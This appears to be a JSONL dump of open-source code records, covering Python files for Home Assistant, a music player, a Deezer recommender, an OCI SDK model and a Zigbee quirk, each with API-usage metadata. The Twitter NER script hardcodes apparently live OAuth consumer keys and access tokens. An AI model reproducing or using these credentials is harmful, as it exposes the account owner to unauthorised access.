"call"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 28, "usage_type": "attribute"}, {"api_name": "homeassistant.core", "line_number": 28, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 34, "usage_type": "attribute"}, {"api_name": "homeassistant.core", "line_number": 34, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 34, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 34, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 37, "usage_type": "argument"}, {"api_name": "homeassistant.const.CONF_HOST", "line_number": 38, "usage_type": "name"}, {"api_name": "homeassistant.const.CONF_API_KEY", "line_number": 39, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 42, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 42, "usage_type": "name"}, {"api_name": "motionblinds.MotionMulticast", "line_number": 43, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 44, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 44, "usage_type": "name"}, {"api_name": "homeassistant.const.EVENT_HOMEASSISTANT_STOP", "line_number": 54, "usage_type": "argument"}, {"api_name": "const.DOMAIN", "line_number": 57, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 57, "usage_type": "name"}, {"api_name": "gateway.ConnectMotionGateway", "line_number": 58, "usage_type": "call"}, {"api_name": "homeassistant.exceptions.ConfigEntryNotReady", "line_number": 60, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 69, "usage_type": "name"}, {"api_name": "socket.timeout", "line_number": 77, "usage_type": "name"}, {"api_name": "homeassistant.helpers.update_coordinator.DataUpdateCoordinator", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 88, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 94, "usage_type": "name"}, {"api_name": "const.KEY_GATEWAY", "line_number": 95, "usage_type": "name"}, {"api_name": "const.KEY_COORDINATOR", "line_number": 96, "usage_type": "name"}, {"api_name": "homeassistant.helpers.device_registry.async_get_registry", "line_number": 99, "usage_type": "call"}, {"api_name": "homeassistant.helpers.device_registry", "line_number": 99, "usage_type": "name"}, {"api_name": "homeassistant.helpers.device_registry.CONNECTION_NETWORK_MAC", "line_number": 102, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.device_registry", "line_number": 102, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 103, "usage_type": "name"}, {"api_name": "const.MANUFACTURER", "line_number": 104, "usage_type": "name"}, {"api_name": "const.MOTION_PLATFORMS", "line_number": 110, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 119, "usage_type": "attribute"}, {"api_name": "homeassistant.core", "line_number": 119, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 119, "usage_type": "attribute"}, {"api_name": "homeassistant.config_entries", "line_number": 119, "usage_type": "name"}, {"api_name": "asyncio.gather", "line_number": 123, "usage_type": "call"}, {"api_name": "const.MOTION_PLATFORMS", "line_number": 126, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 132, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 134, "usage_type": "name"}, {"api_name": "const.KEY_MULTICAST_LISTENER", "line_number": 137, "usage_type": "argument"}, {"api_name": "const.DOMAIN", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "19343239836", "text": "import sys\nfrom PyQt5.QtWidgets import QApplication\nfrom src.window import MainWindow\nimport matlab.engine\nfrom importlib import reload\nfrom calibrate import Calibrate\n\nreload(sys)\n\n\ndef main():\n print(\"Start MatLabEngine:\\n \")\n eng = matlab.engine.start_matlab()\n print(\"Start Calibrate:\\n \")\n Calibrate.calibrate(eng)\n print(\"Start e-book reader:\\n \")\n app = QApplication(sys.argv)\n window = MainWindow(eng)\n window.show()\n qt_return_code = app.exec_()\n print('Qt return code:' + str(qt_return_code))\n sys.exit(qt_return_code)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "KarlRong/Eye-controlled-e-reader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "importlib.reload", "line_number": 8, "usage_type": "call"}, {"api_name": "matlab.engine.engine.start_matlab", "line_number": 13, "usage_type": "call"}, {"api_name": "matlab.engine.engine", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matlab.engine", "line_number": 13, "usage_type": "name"}, {"api_name": "calibrate.Calibrate.calibrate", "line_number": 15, "usage_type": "call"}, {"api_name": "calibrate.Calibrate", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "src.window.MainWindow", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "24605213401", "text": "# PARTIE IMPORTATION\r\n\r\nimport tweepy\r\nimport os\r\nimport nltk\r\nfrom nltk.tag import StanfordNERTagger\r\nfrom nltk.tokenize import word_tokenize\r\n\r\n\r\n# ON REGLE LES CHEMINS DE DIRECTION\r\n\r\nnltk.internals.config_java(\"C:/Program Files (x86)/Java/jre1.8.0_211/bin/java.exe\")\r\njava_path = \"C:/Program Files (x86)/Java/jre1.8.0_211/bin/java.exe\"\r\nos.environ['JAVAHOME'] = java_path\r\nst = StanfordNERTagger('C:/Users/TheoLC/Desktop/python/stanford/classifiers/english.all.3class.distsim.crf.ser.gz','C:/Users/TheoLC/Desktop/python/stanford/stanford-ner.jar',encoding='utf-8')\r\n\r\n\r\n\r\n# ON S'AUTHENTIFIE API TWITTER\r\n\r\nauth = tweepy.OAuthHandler(\"NLZ39ilLBflHHt8myenHdH3Ao\", \"FJ5EAa7DMtnrUHPFNXMuG0heucpzZPatYJNjoixFniWMK8WM0o\")\r\nauth.set_access_token(\"1117700066255474688-5BSckADfdnZTX1WAgTBQib1tnEXBMO\", \"eiTGX94V9NRpXr9cI5j29oR59MzVp1NeVhHNKCrl4xEWl\")\r\napi = tweepy.API(auth, wait_on_rate_limit = True)\r\n\r\n# VIF DU SUJET\r\n\r\nsearch_word = input(\"entrer le mot que vous chercher : \")\r\n\r\ndate_since = \"2019-04-01\"\r\n\r\ntweets = tweepy.Cursor(api.search, q = search_word, lang = \"en\", since = date_since).items(1)\r\n\r\ntweets_text = [[tweet.text] for tweet in tweets]\r\n\r\ndata_final = str(tweets_text)\r\n\r\ntokenized_text = word_tokenize(data_final) # On divise la phrase morceau par morceau, en tokens\r\nclassified_text = st.tag(tokenized_text)\r\n\r\nprint(classified_text)\r\n", "repo_name": "atwika/python_finland", "sub_path": "twitter_search/stanford_twitter.py", "file_name": "stanford_twitter.py", "file_ext": "py", "file_size_in_byte": 1355, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nltk.internals.config_java", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.internals", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "nltk.tag.StanfordNERTagger", "line_number": 15, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 23, "usage_type": "call"}, {"api_name": "tweepy.Cursor", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "15377596105", "text": "import requests\n\n\n'''\n $$$$$$\\ $$\\ $$\\ $$\\ $$\\ \n$$ __$$\\ $$ |$$ | \\__| $$ | \n$$ / \\__| $$$$$$\\ $$\\ $$\\ $$$$$$$\\ $$$$$$$ |$$ | $$\\ $$$$$$$\\ $$ | $$\\ \n\\$$$$$$\\ $$ __$$\\ $$ | $$ |$$ __$$\\ $$ __$$ |$$ | $$ |$$ __$$\\ $$ | $$ |\n \\____$$\\ $$ / $$ |$$ | $$ |$$ | $$ |$$ / $$ |$$ | $$ |$$ | $$ |$$$$$$ / \n$$\\ $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ |$$ _$$< \n\\$$$$$$ |\\$$$$$$ |\\$$$$$$ |$$ | $$ |\\$$$$$$$ |$$$$$$$$\\ $$ |$$ | $$ |$$ | \\$$\\ \n \\______/ \\______/ \\______/ \\__| \\__| \\_______|\\________|\\__|\\__| \\__|\\__| \\__|\n \n \n'''\n\nclass Band:\n def __init__(self, api_key):\n self.api_key = api_key\n self.headers = {'User-Agent': 'Mozilla/5.0'}\n\n def recommend_similar_bands(self, query, limit=10):\n base_url = 'https://api.deezer.com/search/artist'\n params = {\n 'q': query,\n 'output': 'json',\n 'limit': 1 # Limit to 1 result for the initial query\n }\n\n try:\n response = requests.get(base_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n artist_id = data.get('data', [])[0].get('id')\n\n similar_url = f'https://api.deezer.com/artist/{artist_id}/related'\n params = {\n 'limit': limit,\n 'output': 'json'\n }\n\n response = requests.get(similar_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n artists = data.get('data', [])\n\n print(f\"Recommended similar bands to '{query}':\")\n for i, artist in enumerate(artists[:limit], 1):\n name = artist['name']\n print(f\"{i}. {name}\")\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred: {e}\")\n\nclass Song:\n def __init__(self, api_key):\n self.api_key = api_key\n self.headers = {'User-Agent': 'Mozilla/5.0'}\n\n def recommend_songs(self, query, limit=10):\n base_url = 'https://api.deezer.com/search'\n params = {\n 'q': query,\n 'output': 'json',\n 'limit': 1\n }\n\n try:\n response = requests.get(base_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n artist_id = data.get('data', [])[0].get('artist', {}).get('id')\n\n tracks_url = f'https://api.deezer.com/artist/{artist_id}/top'\n params = {\n 'limit': limit,\n 'output': 'json'\n }\n\n response = requests.get(tracks_url, params=params, headers=self.headers)\n response.raise_for_status()\n data = response.json()\n\n tracks = data.get('data', [])\n\n print(f\"Recommended songs from {query} in order of relevance:\")\n recommended_songs = set()\n for i, track in enumerate(tracks[:limit], 1):\n artist = track['artist']['name']\n title = track['title']\n song = f\"{artist} - {title}\"\n if song not in recommended_songs:\n print(f\"{i}. {song}\")\n recommended_songs.add(song)\n except requests.exceptions.RequestException as e:\n print(f\"An error occurred: {e}\")\n\n\n\n\ndef get_band_recommendations(query, limit, api_key):\n api_key = api_key\n __recommendation = Band(api_key).recommend_similar_bands(query, limit)\n return __recommendation\n\n\ndef get_song_recommendations(query, limit, api_key):\n api_key = api_key\n __recommendation = Song(api_key).recommend_songs(query, limit)\n return __recommendation\n", "repo_name": "tudor-Spaima/SoundLink", "sub_path": "lib/soundlink.py", "file_name": "soundlink.py", "file_ext": "py", "file_size_in_byte": 4068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 53, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 97, "usage_type": "attribute"}]} +{"seq_id": "31601793019", "text": "from .payment_option import PaymentOption\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass PaypalPaymentOption(PaymentOption):\n \"\"\"\n PayPal Payment related details\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new PaypalPaymentOption object with values from keyword arguments. The default value of the :py:attr:`~oci.osp_gateway.models.PaypalPaymentOption.payment_method` attribute\n of this class is ``PAYPAL`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param wallet_instrument_id:\n The value to assign to the wallet_instrument_id property of this PaypalPaymentOption.\n :type wallet_instrument_id: str\n\n :param wallet_transaction_id:\n The value to assign to the wallet_transaction_id property of this PaypalPaymentOption.\n :type wallet_transaction_id: str\n\n :param payment_method:\n The value to assign to the payment_method property of this PaypalPaymentOption.\n Allowed values for this property are: \"CREDIT_CARD\", \"PAYPAL\"\n :type payment_method: str\n\n :param email_address:\n The value to assign to the email_address property of this PaypalPaymentOption.\n :type email_address: str\n\n :param first_name:\n The value to assign to the first_name property of this PaypalPaymentOption.\n :type first_name: str\n\n :param last_name:\n The value to assign to the last_name property of this PaypalPaymentOption.\n :type last_name: str\n\n :param ext_billing_agreement_id:\n The value to assign to the ext_billing_agreement_id property of this PaypalPaymentOption.\n :type ext_billing_agreement_id: str\n\n \"\"\"\n self.swagger_types = {\n 'wallet_instrument_id': 'str',\n 'wallet_transaction_id': 'str',\n 'payment_method': 'str',\n 'email_address': 'str',\n 'first_name': 'str',\n 'last_name': 'str',\n 'ext_billing_agreement_id': 'str'\n }\n\n self.attribute_map = {\n 'wallet_instrument_id': 'walletInstrumentId',\n 'wallet_transaction_id': 'walletTransactionId',\n 'payment_method': 'paymentMethod',\n 'email_address': 'emailAddress',\n 'first_name': 'firstName',\n 'last_name': 'lastName',\n 'ext_billing_agreement_id': 'extBillingAgreementId'\n }\n\n self._wallet_instrument_id = None\n self._wallet_transaction_id = None\n self._payment_method = None\n self._email_address = None\n self._first_name = None\n self._last_name = None\n self._ext_billing_agreement_id = None\n self._payment_method = 'PAYPAL'\n\n @property\n def email_address(self):\n \"\"\"\n Gets the email_address of this PaypalPaymentOption.\n The email address of the paypal user.\n\n\n :return: The email_address of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._email_address\n\n @email_address.setter\n def email_address(self, email_address):\n \"\"\"\n Sets the email_address of this PaypalPaymentOption.\n The email address of the paypal user.\n\n\n :param email_address: The email_address of this PaypalPaymentOption.\n :type: str\n \"\"\"\n self._email_address = email_address\n\n @property\n def first_name(self):\n \"\"\"\n Gets the first_name of this PaypalPaymentOption.\n First name of the paypal user.\n\n\n :return: The first_name of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._first_name\n\n @first_name.setter\n def first_name(self, first_name):\n \"\"\"\n Sets the first_name of this PaypalPaymentOption.\n First name of the paypal user.\n\n\n :param first_name: The first_name of this PaypalPaymentOption.\n :type: str\n \"\"\"\n self._first_name = first_name\n\n @property\n def last_name(self):\n \"\"\"\n Gets the last_name of this PaypalPaymentOption.\n Last name of the paypal user.\n\n\n :return: The last_name of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._last_name\n\n @last_name.setter\n def last_name(self, last_name):\n \"\"\"\n Sets the last_name of this PaypalPaymentOption.\n Last name of the paypal user.\n\n\n :param last_name: The last_name of this PaypalPaymentOption.\n :type: str\n \"\"\"\n self._last_name = last_name\n\n @property\n def ext_billing_agreement_id(self):\n \"\"\"\n Gets the ext_billing_agreement_id of this PaypalPaymentOption.\n Agreement id for the paypal account.\n\n\n :return: The ext_billing_agreement_id of this PaypalPaymentOption.\n :rtype: str\n \"\"\"\n return self._ext_billing_agreement_id\n\n @ext_billing_agreement_id.setter\n def ext_billing_agreement_id(self, ext_billing_agreement_id):\n \"\"\"\n Sets the ext_billing_agreement_id of this PaypalPaymentOption.\n Agreement id for the paypal account.\n\n\n :param ext_billing_agreement_id: The ext_billing_agreement_id of this PaypalPaymentOption.\n :type: str\n \"\"\"\n self._ext_billing_agreement_id = ext_billing_agreement_id\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/osp_gateway/models/paypal_payment_option.py", "file_name": "paypal_payment_option.py", "file_ext": "py", "file_size_in_byte": 5813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "payment_option.PaymentOption", "line_number": 7, "usage_type": "name"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 174, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "36612135996", "text": "import os\nfrom tkinter import *\nimport tkinter.messagebox\nfrom pygame import mixer\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom ttkthemes import themed_tk as tk\n\nfrom mutagen.mp3 import MP3\nimport threading\nimport time\n\n\nmixer.init()\n\nroot = tk.ThemedTk()\n\nroot.get_themes()\nroot.set_theme(\"winxpblue\")\n#radiance\n\nroot.title(\"Music Player\")\nroot.geometry(\"600x430+0+0\")\nroot.resizable(False, False)\nroot.iconbitmap(r'music-player.ico')\n\nfile = ttk.Label(root, text=\"MP3 Player\", relief=GROOVE, font=(\"times new roman\", 30, 'bold'))\nfile.place(x=180, y=10)\n\nfile_length = ttk.Label(root, text=\"Total length 00 : 00\", relief=GROOVE, font=(\"times new roman\", 15, 'bold'))\nfile_length.place(x=295, y=105)\n\ncurrent_time = ttk.Label(root, text=\"Current Time 00 : 00\",relief=GROOVE, font=(\"times new roman\", 12, 'bold'))\ncurrent_time.place(x=305, y=145)\n\n\nsongs = ttk.Label(root, text=\"Song List\", font=(\"Times new roman\", 18, 'bold '))\nsongs.place(x=40, y=78)\nlistbox = Listbox(root, width=31, height=13, font=('times new roman', 10, 'bold'))\nlistbox.place(x=40, y=111)\n\n\n\n\nplay_img = PhotoImage(file=\"play.png\")\npause_img = PhotoImage(file=\"pause.png\")\nstop_img = PhotoImage(file=\"Stop.png\")\nspeaker_img = PhotoImage(file=\"speaker.png\")\nmute_img = PhotoImage(file=\"Mute.png\")\n\n\nsong_list = []\n\ndef Browse_file():\n global file_path\n file_path = filedialog.askopenfilename()\n\n add_to_list(file_path)\n\n\ndef add_to_list(f):\n index = 0\n f = os.path.basename(f)\n listbox.insert(index, f)\n song_list.insert(0, file_path)\n index += 1\n\n\n\nmenubar = Menu(root)\nroot.config(menu=menubar)\n\nsubMenu = Menu(menubar, tearoff=0)\nsubMenus = Menu(menubar, tearoff=0)\nsubMenuss = Menu(menubar, tearoff=0)\n\nmenubar.add_cascade(label=\"File\", menu=subMenu)\nmenubar.add_cascade(label=\"View\", menu=subMenus)\nmenubar.add_cascade(label=\"Exit\", menu=subMenuss)\n\nsubMenu.add_command(label=\"Open File\", command=Browse_file)\nsubMenus.add_command(label=\"View\", command=lambda: print(\"This is view section\"))\n\n\n\ndef song_details(file):\n\n file_data = os.path.splitext(file)\n\n if file_data[1] == \".mp3\":\n audio = MP3(file)\n length = audio.info.length\n\n else:\n a = mixer.Sound(file)\n length = a.get_length()\n\n\n mins, sec = divmod(length, 60)\n mins = round(mins)\n sec = round(sec)\n\n timeformat = '{:02d} : {:02d}'.format(mins, sec)\n\n file_length['text'] = \"Total length \" + timeformat\n #start_counter(length)\n\n\n t1 = threading.Thread(target=start_counter, args=(length,))\n t1.start()\n\n\n\n\n\ndef start_counter(t):\n\n while t and mixer.music.get_busy():\n mins, sec = divmod(t, 60)\n mins = round(mins)\n sec = round(sec)\n currentFormat = '{:02d} : {:02d}'.format(mins, sec)\n\n current_time['text'] = \"Current time \" + currentFormat\n time.sleep(1)\n t -= 1\n\n\n\n\ndef Play():\n try:\n pause\n\n except NameError:\n try:\n\n Stop()\n time.sleep(1)\n selectd_song = listbox.curselection()\n selectd_song = int(selectd_song[0])\n play_it = song_list[selectd_song]\n\n mixer.music.load(play_it)\n mixer.music.play()\n\n statusBar['text'] = \"Playing Music\" + ' ' + os.path.basename(play_it)\n\n song_details(play_it)\n\n except NameError:\n tkinter.messagebox.showerror(\"File not Found\", \"Kindly Upload Audio File\")\n\n else:\n mixer.music.unpause()\n statusBar['text'] = \"Music Resumed\"\n\n\n\n\n\ndef Pause():\n global pause\n pause = True\n mixer.music.pause()\n statusBar['text'] = \"Music Paused\"\n\n\n\ndef Stop():\n global stop\n\n mixer.music.stop()\n statusBar['text'] = \"Music Stopped\"\n\n\ndef volume(val):\n vol = float(val) / 10\n mixer.music.set_volume(vol)\n\n\nmute = False\n\n\ndef Mute():\n global mute\n\n if mute:\n mixer.music.set_volume(0.5)\n scale.set(5)\n statusBar['text'] = \"Playing Music\" + ' ' + os.path.basename(file_path)\n mute = False\n else:\n mixer.music.set_volume(0)\n scale.set(0)\n statusBar['text'] = \"Music Muted\"\n mute = True\n\n# Differrent buttons\nplay_btn = ttk.Button(root, image=play_img, command=Play)\nplay_btn.place(x=290, y=185)\n\npause_btn = ttk.Button(root, image=pause_img, command=Pause)\npause_btn.place(x=355, y=185)\n\nstop_btn = ttk.Button(root, image=stop_img, command=Stop)\nstop_btn.place(x=420, y=185)\n\nadd_song_btn = ttk.Button(root, text=\"Add song\", command=Browse_file)\nadd_song_btn.place(x=52, y=325)\n\ndef del_song():\n selectd_song = listbox.curselection()\n selectd_song = int(selectd_song[0])\n listbox.delete(selectd_song)\n song_list.pop(selectd_song)\n\n\n\n\n\n\ndel_song_btn = ttk.Button(root, text=\"Delete song\", command=del_song)\ndel_song_btn.place(x=148, y=325)\n\n\nspeaker = ttk.Button(root, image=speaker_img, command=Mute).place(x=305, y=265)\n\nscale = ttk.Scale(root, from_=0, to=10, orient=HORIZONTAL, command=volume)\nscale.place(x=355, y=272)\nscale.set(5)\n\nstatusBar = ttk.Label(root, font=('times new roman', 12, 'bold'), text=\"Welcome to Python-Music player\", anchor=W)\nstatusBar.pack(side=BOTTOM, fill=X)\n\n\ndef close_window():\n Stop()\n root.destroy()\n\nsubMenuss.add_command(label=\"Exit\", command = close_window)\nroot.protocol(\"WM_DELETE_WINDOW\", close_window)\nroot.mainloop()", "repo_name": "SarfrazAHd/BaseRepo", "sub_path": "Python/Python_Project/MUSIC_PLAYER/Music_Player.py", "file_name": "Music_Player.py", "file_ext": "py", "file_size_in_byte": 5337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.mixer.init", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 14, "usage_type": "name"}, {"api_name": "ttkthemes.themed_tk.ThemedTk", "line_number": 16, "usage_type": "call"}, {"api_name": "ttkthemes.themed_tk", "line_number": 16, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 27, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 30, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 30, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 37, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 37, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "mutagen.mp3.MP3", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 95, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.mixer.music.get_busy", "line_number": 118, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 118, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 144, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 145, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 145, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 152, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 155, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 155, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 155, "usage_type": "name"}, {"api_name": "pygame.mixer.music.pause", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 165, "usage_type": "name"}, {"api_name": "pygame.mixer.music.stop", "line_number": 173, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 173, "usage_type": "name"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 179, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 179, "usage_type": "name"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 189, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 189, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 189, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 194, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 200, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 200, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 203, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 203, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 206, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 206, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 209, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 209, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 223, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 223, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 227, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 227, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scale", "line_number": 229, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 229, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 233, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 233, "usage_type": "name"}]} +{"seq_id": "23938456544", "text": "\"\"\"Quirk for ZLinky_TIC.\"\"\"\nfrom zigpy.profiles import zha\nfrom zigpy.quirks import CustomCluster, CustomDevice\nfrom zigpy.zcl.clusters.general import Basic, GreenPowerProxy, Identify, Ota\nfrom zigpy.zcl.clusters.homeautomation import ElectricalMeasurement, MeterIdentification\nfrom zigpy.zcl.clusters.smartenergy import Metering\n\nfrom zhaquirks.const import (\n DEVICE_TYPE,\n ENDPOINTS,\n INPUT_CLUSTERS,\n MODELS_INFO,\n OUTPUT_CLUSTERS,\n PROFILE_ID,\n)\nfrom zhaquirks.lixee import LIXEE\n\n\nclass ZLinkyTICMetering(CustomCluster, Metering):\n \"\"\"ZLinky_TIC custom metring cluster.\"\"\"\n\n # ZLinky_TIC reports current_summ_delivered in Wh\n # Home Assistant expects kWh (1kWh = 1000 Wh)\n MULTIPLIER = 0x0301\n DIVISOR = 0x0302\n _CONSTANT_ATTRIBUTES = {MULTIPLIER: 1, DIVISOR: 1000}\n\n\nclass ZLinkyTIC(CustomDevice):\n \"\"\"ZLinky_TIC from LiXee.\"\"\"\n\n signature = {\n MODELS_INFO: [(LIXEE, \"ZLinky_TIC\")],\n ENDPOINTS: {\n 1: {\n PROFILE_ID: zha.PROFILE_ID,\n DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,\n INPUT_CLUSTERS: [\n Basic.cluster_id,\n Identify.cluster_id,\n Metering.cluster_id,\n MeterIdentification.cluster_id,\n ElectricalMeasurement.cluster_id,\n 0xFF66, # Manufacturer Specific\n ],\n OUTPUT_CLUSTERS: [Ota.cluster_id],\n },\n 242: {\n PROFILE_ID: 41440,\n DEVICE_TYPE: 0x0061,\n INPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n OUTPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n },\n },\n }\n replacement = {\n ENDPOINTS: {\n 1: {\n PROFILE_ID: zha.PROFILE_ID,\n DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,\n INPUT_CLUSTERS: [\n Basic.cluster_id,\n 